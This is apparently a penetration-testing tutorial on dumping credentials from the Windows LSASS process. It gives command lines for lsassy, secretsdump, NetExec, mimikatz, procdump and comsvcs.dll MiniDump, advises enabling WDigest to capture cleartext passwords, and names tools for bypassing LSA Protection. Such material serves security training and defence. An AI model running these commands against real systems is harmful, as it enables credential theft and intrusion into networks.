LSASS Process

On a Windows machine, a common place to find credentials is the Local Security Authority Subsystem Service (LSASS) process (lsass.exe). The LSASS process is responsible for managing computer security operations, including user authentication.

Recovering LSASS memory is probably the most known technique to retrieve sensitive secrets and can contain the following elements:

• User / Machine hashes.

• Cleartext credentials (if wdigest is enabled).

• Kerberos tickets (TGT and ST).

• DPAPI cached keys.

When a user connects interactively to the computer, either by physically accessing the computer or via RDP, the user's credentials are cached in the LSASS process in order to use SSO (Single Sign-On) when a network connection is required to access other computers in the domain.

The credentials are cached by some of the SSPs (Security Support Providers) that are used by LSASS to provide different authentication methods. Some of the SSPs are as follows:

• The Kerberos SSP manages Kerberos authentication and is responsible for storing Kerberos tickets and keys for currently connected users.

• The NTLMSSP or MSV SSP manages NTLM authentication and is responsible for storing NT hashes for currently logged-in users. It does not cache the credentials used.

• The Digest SSP implements the Digest access protocol used by HTTP applications. It is the SSP that stores the user password in clear text in order to calculate the digest. Although password caching has been disabled by default since Windows 2008 R2, it is still possible to enable password caching by setting the HKLM\SYSTEM\CurrentControlSet\SecurityProviders\WDigest\UseLogonCredential registry entry to 1 or by patching the Digest SSP directly in memory.

Therefore, if you can access the memory of the LSASS process, for which SeDebugPrivilege is required (usually held by administrators) since LSASS is a system process, you can retrieve the cached credentials. These cached credentials, therefore, include the user's NT hash, Kerberos keys and tickets, and possibly the user's passwords in clear text if WDigest is enabled. A good technique is to activate WDigest on a server that is often used to collect passwords in clear text. It is possible to to that by editing the following registry HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential to REG_DWORD - 1.

Practical Exploitation:

# Lsassy script 
lsassy -u <USER> -p <PASSWORD> <TARGETS>

secretsdump.py <DOMAIN>/<USERNAME>:<PASSWORD>@<TARGET>

# Lsassy module
nxc smb <TARGETS> -u <USER> -p <PASSWORD> -M lsassy
nxc smb <TARGETS> -u <USER> -p <PASSWORD> -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=<NEO4J_PASSWORD>

privilege::debug
sekurlsa::minidump C:\mem.dmp
sekurlsa::longonpasswords

# Find the PID of the LSASS.exe process
get-process lsass

# Dump lsass.exe
procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp

# Use directly the LSASS pid
procdump.exe -accepteula -ma <LSASS_PID> out.dmp

.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <LSASS_PID> C:\temp\lsass.dmp full

Sqldumper.exe <ProcessID> 0 0x0128

WerFault.exe -u -p <target process> -ip <source process> -s <file mapping handle>

LSA Protection

Since then, Microsoft has implemented more protection around the LSASS process. With Windows Server 2012 R2 and 8.1 there is a feature called LSA (Local Security Authority) Protection according to the following Microsoft page it is possible to run LSASS as a protected process. Here's the registry key responsible for this: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL.

While there exists a workaround, like modifying a driver or bypass the signature verification code, it had become more difficult to dump the LSASS process, but not impossible.

After the use of PPLDump, PPLMedic, the latest solution that has been found is PPLFault.

References :